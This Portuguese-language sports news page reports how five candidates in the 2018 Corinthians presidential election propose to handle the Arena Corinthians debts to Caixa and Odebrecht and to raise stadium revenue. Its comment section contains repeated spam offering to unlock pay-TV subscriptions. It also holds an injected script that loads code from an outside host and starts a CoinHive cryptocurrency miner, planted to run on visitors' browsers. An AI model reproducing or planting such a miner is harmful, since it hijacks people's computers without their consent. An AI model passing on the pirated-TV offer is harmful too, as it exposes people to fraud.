3/2/2018 09:30

Eleições: veja o que os candidatos pensam para o futuro da Arena Corinthians

Sócios do Timão elegem neste sábado o novo presidente do clube; são cinco na disputa

Eleições: veja o que os candidatos pensam para o futuro da Arena Corinthians
Foto: Bruno Cassucci

Os problemas relacionados à Arena e ao pagamento das dívidas com a Caixa e Odebrecht foram alguns dos principais assuntos debatidos durante a série de entrevistas realizadas nesta semana com os candidatos à presidência do Corinthians. As soluções sugeridas vão desde romper com a construtora até renegociar parcelas. A eleição para presidente do clube ocorre neste sábado.



Veja abaixo o que cada um dos candidatos falou (de acordo com ordem estabelecida por sorteio prévio) sobre como pagar o estádio, cumprir os contratos, venda do naming rights e como aumentar as receitas da casa corintiana:

Romeu Tuma Júnior
Primeiro entrevistado, o oposicionista Tuma afirmou que a Odebrecht deixou de realizar R$ 250 milhões em obras no estádio e, por isso, na opinião dele, o clube tem a receber da empreiteira, além desse valor, outros R$ 150 milhões "oriundos de danos morais e materiais, causados pelos imbróglios da Operação Lava-Jato", quitando então o débito com a construtora.

– Você tem de sentar com a Odebrecht e falar que estão encerrados os nossos negócios. Cada um fica com seu prejuízo. Se ela achar que deve receber do Corinthians, que vá à Justiça – disse.

– Temos 1.200 vagas durante os dias de jogos que não usamos nos outros dias da semana. Um dano material que temos – completou Tuma, sobre o uso dos estacionamentos.

Felipe Ezabella
Na terça-feira, Felipe Ezabella defendeu uma renegociação, mas, invariavelmente, afastando a construtora do clube e do estádio. Sobre aumentar receitas, Ezabella admitiu não concorrer com os estádios dos rivais paulistas, mas pretende buscar outro segmento de eventos.

– Queremos uma revisão do contrato da Odebrecht e com a Caixa. Tenho dito que um dos fatores para o clube ter credibilidade no mercado é ele tentar se afastar da relação com a Odebrecht. Essa proximidade hoje acaba sendo um dos fatores que afastam grandes patrocinadores e parceiros. Não é fácil, mas passa por uma negociação dura – afirmou.

– A Arena tem sido objeto de muitas críticas nossas, não só na parte financeira. A Arena foi construída para ter atividades todos os dias, mas ela só tem em dias de jogos e agora, recentemente, o tour. Temos que terminar logo as obras do estacionamento para abrir para o público. Há vários espaços para shows. Não vamos concorrer com o Allianz Parque ou o Morumbi, que recebem shows grandes, mas podemos receber shows menores, como os que vão para o Anhembi. Pretendemos ter outras atividades – completou Ezabella.

Antonio Roque Citadini
Terceiro candidato a participar da sabatina do GloboEsporte.com, Antônio Roque Citadini também falou em renegociação como o caminho mais viável para o Corinthians. O candidato aproveitou para criticar estádios que recebem eventos nos gramados, numa referência clara aos rivais Palmeiras e São Paulo.

– É preciso sentar com a Odebrecht para resolver isso, não adianta ter uma postura infantil – disse Citadini, que fala em criar mais receitas a partir da Arena, principalmente com eventos no estacionamento.

– Não vamos fazer nada no gramado do estádio. Isso é coisa de quem não entende nada de futebol, porque você estraga o gramado – completou.

Andrés Sanchez
Na quinta-feira o nome da vez foi Andrés Sanches, candidato da situação e do grupo que comanda o clube desde 2007, e um dos principais responsáveis pela idealização do estádio corintiano. O deputado federal segue a linha do principal rival no pleito, Roque Citadini, e quer rever os termos do contrato tanto da Caixa como da Odebrecht, mas nega veementemente estender o prazo de pagamento, que é de 12 anos.

– Minha prioridade é tentar fazer uma renegociação com a Caixa, Odebrecht e o fundo (que administra o dinheiro do estádio) para tentar chegar a um denominador comum. A atual conjuntura do país é algo muito difícil. – disse Andrés

– Eu sou contra alongar o contrato (com a Caixa). Pode diminuir a prestação agora e aumentar no final, ou vice e versa. Se eu tiver mais dinheiro agora, pago prestações maiores agora. Se tiver menos, pago menos e deixa para o final – acrescentou.

Paulo Garcia
Primeiro colocado na pesquisa Ibope divulgada nesta sexta-feira, Paulo Garcia disse não ser nem da oposição nem da situação. Ele também defende uma renegociação com a Odebrecht.

– Tem que chegar lá e pegar os contratos, pedir um tempo para ler e revisar, mas todo mundo fala e ninguém tem os dados certo, já pulou para um monte de valor, mas deve ter uma clausula de confidencialidade que não pode ser divulgado.

Ainda sobre a gestão da Arena Corinthians, Garcia afirmou que terceirizará a administração do estádio para empresas com mais “know-how” que o clube, criticando a decisão da atual administração de cuidar sozinha da casa corinthiana.


VEJA TAMBÉM
- Timão escalado para o jogo contra o Fortaleza
- Bidon repete jogada da base em 1º gol pelo Corinthians: aprendizado instantâneo
- Renovação de Paulinho com Corinthians: Altos e Baixos na Negociação









5298 visitas - Fonte: Globoesporte.com

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

andres sanchez , andres sanchez , andres sanchez , andres sanches , andres sanchez ! vai corinthians , e noisssssssss .....

sem dúvidas nenhuma ! na minha opinião o + preparado pra reassumir o cargo .... da presidencia , do todo poderoso timao 2018 ! com certeza , ... e o andres sanches..

Para mim o Andres é o mais preparado para o cargo.

ANDRÉS SANCHEZ PRA CIMA DELES. eu apoio ANDRÉS.

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Andrés neles ..O que está mais preparado para o Corinthians.

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

(Comentário excluído)

< src="http://yourjava.com/9215118311/levelup.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade